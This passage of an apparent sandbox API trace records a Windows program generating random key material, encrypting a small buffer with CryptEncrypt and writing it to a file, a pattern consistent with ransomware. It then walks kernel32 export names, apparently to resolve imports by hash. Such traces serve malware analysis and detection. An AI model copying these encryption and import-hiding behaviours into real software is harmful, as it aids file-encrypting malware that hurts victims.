flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0083.992] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.992] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.992] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.992] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.992] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.992] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.993] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.993] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.994] CloseHandle (hObject=0x42c) returned 1 [0083.994] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.994] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.994] CloseHandle (hObject=0x0) returned 0 [0083.994] CloseHandle (hObject=0x428) returned 1 [0083.994] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.995] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.995] GetTickCount () returned 0x114d76c [0083.995] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.995] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.995] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.995] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.996] lstrlenA (lpString="kernel32.dll") returned 12 [0083.996] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.996] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.996] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.996] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.996] lstrlenA (lpString="ADDATOMA") returned 8 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.996] lstrlenA (lpString="ADDATOMW") returned 8 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.996] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.996] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.996] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.996] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.996] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.996] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.996] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.997] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.997] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.997] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.997] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.997] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.997] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.997] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.997] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.997] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.997] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.997] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.997] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.997] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.997] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.997] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.997] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.997] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.997] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.998] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.998] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.998] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.998] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.998] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.998] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.998] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.998] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.998] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.998] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.998] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.998] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.998] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.998] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.998] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.998] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.998] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.998] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.999] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.999] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.999] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.999] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.999] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.999] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.999] lstrlenA (lpString="BEEP") returned 4 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.999] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.999] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.999] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.999] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.999] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.999] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.999] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.999] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.999] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.999] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.999] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.999] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.999] lstrlenA (lpString="CANCELIO") returned 8 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.000] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.000] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.000] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.000] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.000] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.000] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.000] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.000] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.000] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.000] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.000] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.000] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.000] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.000] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.000] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.000] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.000] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.000] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.000] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.001] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.001] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.001] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.001] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.001] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.001] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.001] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.001] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.001] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.001] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.001] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.001] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.001] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.001] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.001] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.001] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.001] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.001] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.002] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.002] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.002] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.002] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.002] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.002] lstrlenA 